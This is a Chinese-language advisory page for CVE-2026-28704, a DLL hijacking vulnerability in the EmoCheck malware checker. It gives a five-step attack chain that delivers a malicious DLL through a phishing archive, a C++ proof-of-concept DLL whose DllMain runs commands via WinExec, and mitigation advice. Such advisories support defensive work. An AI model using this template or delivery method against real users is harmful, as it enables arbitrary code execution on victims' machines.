CVE-2026-28704 CVSS 7.8 高危

CVE-2026-28704 EmoCheck DLL劫持漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28704

漏洞类型

DLL劫持

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

EmoCheck

漏洞概述

EmoCheck是一款用于检测恶意软件的安全工具。CVE-2026-28704是该软件中存在的一个高危漏洞，主要由于不安全地加载动态链接库（DLL）导致。攻击者可以将精心制作的恶意DLL文件放置在EmoCheck的目录中，当用户运行该工具时，恶意DLL会被自动加载并执行，从而赋予攻击者与当前用户相同的系统权限，可能导致敏感信息泄露或系统被完全控制。

技术细节

该漏洞属于典型的DLL劫持或DLL侧加载漏洞。Windows应用程序在加载动态链接库时，通常遵循特定的搜索顺序。如果应用程序未指定DLL的完整绝对路径，系统会优先检查应用程序当前工作目录。EmoCheck在实现过程中未能正确处理DLL加载路径，导致其不安全地加载了同目录下的DLL文件。攻击者可以利用这一机制，将恶意的DLL文件重命名为EmoCheck试图加载的库名，并将其放置在EmoCheck的运行目录下。一旦用户在该目录下运行EmoCheck，恶意代码即被加载并执行。虽然攻击向量为本地（AV:L），但这常被用于钓鱼攻击，攻击者将打包好的恶意工具分发给受害者，诱导其解压并运行，从而在受害者主机上执行任意代码，获取与当前用户相同的控制权。

攻击链分析

STEP 1

1. 准备恶意DLL

攻击者分析EmoCheck加载的DLL列表，编写包含恶意代码的DLL文件，并将其重命名为目标DLL名称。

STEP 2

2. 放置恶意文件

攻击者将恶意DLL文件放置在EmoCheck的工作目录中，通常通过诱导用户下载并解压包含该文件的压缩包实现。

STEP 3

3. 诱导用户执行

攻击者诱导用户在包含恶意DLL的目录下运行EmoCheck程序（例如，声称扫描病毒）。

STEP 4

4. 触发漏洞

EmoCheck启动时，由于未指定安全路径，优先加载了同目录下的恶意DLL。

STEP 5

5. 执行代码

恶意DLL中的代码被系统执行，攻击者获得当前用户的权限，可进行后续恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC code for CVE-2026-28704 (DLL Hijacking)
// This is a generic template for a malicious DLL.
// Compile as a DLL and rename it to match the DLL EmoCheck tries to load.

#include <windows.h>
#include <stdlib.h>

// Example export function. The actual function name depends on EmoCheck's imports.
extern "C" __declspec(dllexport) void AnExportedFunction() {
    // Arbitrary code execution payload
    WinExec("cmd.exe /c whoami > C:\\temp\\poc.txt", SW_HIDE);
    // Or pop a calc for demonstration
    WinExec("calc.exe", SW_SHOW);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Code to run when the DLL is loaded by the vulnerable EmoCheck process
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)AnExportedFunction, NULL, 0, NULL);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

影响范围

EmoCheck (具体受影响版本请参考官方公告)

防御指南

临时缓解措施

用户应确保从官方渠道下载EmoCheck，并将下载的压缩包解压在受信任的目录下运行。建议以最低权限运行该工具，避免使用管理员权限运行，以减少潜在风险。同时，关注厂商发布的安全公告并及时更新软件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-28704
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-28704
3 Details https://www.cvedetails.com/cve/CVE-2026-28704/
4 VulDB https://vuldb.com/cve/CVE-2026-28704
5 Link https://github.com/JPCERTCC/EmoCheck/
6 Link https://jvn.jp/en/jp/JVN00263243/
7 Link https://www.jpcert.or.jp/press/2026/PR20260410.html

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表